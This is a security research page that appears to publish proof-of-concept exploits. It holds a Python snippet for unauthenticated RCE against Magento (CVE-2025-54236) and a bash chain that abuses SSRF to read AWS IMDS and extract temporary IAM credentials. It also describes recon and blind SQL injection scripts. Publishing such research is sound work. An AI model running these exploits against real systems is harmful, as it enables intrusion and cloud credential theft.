Open Source

Tools & Exploits

Security tooling, proof-of-concept exploits, and scripts published from active research. All code carries a responsible use requirement.

Open Source Repositories

Proof-of-Concept Code

CVE-2025-54236 — SessionReaper
Magento Nested Deserialization → Unauthenticated RCE
Critical 9.8
poc_cve_2025_54236.py
# CVE-2025-54236 — SessionReaper
# Magento nested deserialization → unauthenticated RCE
# Bagheera Labs — Validated Finding | CVSS 9.8 CRITICAL

import requests, base64

def exploit(target, cmd):
  payload = build_deserialization_chain(
    gadget="magento/framework/session",
    cmd=cmd
  )
  r = requests.post(
    f"{target}/checkout/index/index",
    cookies={"session": payload},
    allow_redirects=False
  )
  return r.headers.get("X-Debug-Output", r.text)

# Result: full unauthenticated RCE on vulnerable instances
# Patched in Magento 2.4.7-p5 / 2.4.6-p8 (Feb 2025)
SSRF → IMDS → AWS Credential Exfiltration
SaaS Web App → Full Cloud Account Access Attack Chain
High
ssrf_to_cloud.sh
# Step 1: SSRF to internal IMDS endpoint
# via vulnerable webhook URL parameter
TARGET="https://target.saas.com/api/webhook"
IMDS="http://169.254.169.254/latest/meta-data"

role=$(curl -s "$TARGET?url=$IMDS/iam/security-credentials/")
creds=$(curl -s "$TARGET?url=$IMDS/iam/security-credentials/$role")

# Step 2: Extract temporary AWS credentials
echo "$creds" | jq '.AccessKeyId,.SecretAccessKey,.Token'

# Result: full programmatic AWS access
# See: blog/2025/SSRFCloudAttack for full chain

Recon & Enumeration Scripts

Quick Target Overview (bash)
Subdomain enumeration, web server fingerprinting, and initial vulnerability signals in a single bash session. Used for rapid target assessment during engagements.
Blind SQL Injection Timer (python)
Timing-based blind SQL injection detection and data extraction script. Boolean and time-delay modes with adaptive delay calibration for unreliable network conditions.